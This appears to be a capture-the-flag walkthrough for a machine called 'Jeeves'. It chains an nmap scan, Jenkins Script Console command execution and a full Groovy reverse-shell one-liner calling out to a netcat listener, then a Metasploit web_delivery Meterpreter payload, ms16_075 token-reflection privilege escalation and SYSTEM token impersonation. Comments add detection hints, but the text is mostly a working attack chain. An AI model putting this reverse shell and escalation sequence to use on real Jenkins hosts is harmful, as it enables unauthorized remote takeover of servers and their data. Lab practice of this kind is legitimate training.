Jeeves Potato Attack
nmap -p-
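// Runs `systeminfo` through cmd.exe on the Jenkins host and prints its output in the console.
// Fixed the "syteminfo" typo in the command string. Anyone who can reach the Script Console gets
// this level of execution as the Jenkins service account, so the console must be restricted to
// trusted administrators and its use should be logged/monitored.
println "cmd.exe /c systeminfo".execute().text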
#Groovy Script Console
#Netcat
nc -nlvp 4444
#Paste into the console
// Reverse-shell relay: cmd.exe's standard streams are bridged over an outbound TCP socket to host:port.
// Pasted into the Jenkins Script Console it runs as the Jenkins service account on the server, which is
// why console access must be limited to administrators. Defensive signals visible from this code: the
// Jenkins JVM spawning cmd.exe and an outbound connection to an unusual host/port (4444 here).
String host="IP"; // listener address; "IP" is a placeholder to replace
int port=4444; // listener port; matches the `nc -nlvp 4444` listener above
// Flow of the one-liner below: start cmd.exe with stderr merged into stdout (redirectErrorStream(true)),
// connect the socket, then every 50 ms copy process stdout/stderr -> socket and socket -> process stdin.
// p.exitValue() throws while cmd.exe is still running; the empty catch is used as the "still alive" test,
// and the loop breaks once the process has exited. Finally the process is destroyed and the socket closed.
String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); // pe is always empty because stderr was redirected into stdout
#MSFConsole
Create a Meterpreter shell
msfconsole
use exploit/multi/script/web_delivery
options
show targets
set target 2 (powershell)
set payload windows/meterpreter/reverse_tcp
set lhost 10.1.1.1
set srvhost 10.1.1.1
run
copy the output and paste it into the cmd prompt of the non-privileged shell
#Meterpreter
getprivs
run post/multi/recon/local_exploit_suggester
background
use exploit/windows/local/ms16_075_reflection
set lhost and set lport
set session #
set payload windows/meterpreter/reverse_tcp
load incognito
list_tokens -u
copy "NT AUTHORITY\SYSTEM"
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami
dir /R
more < filename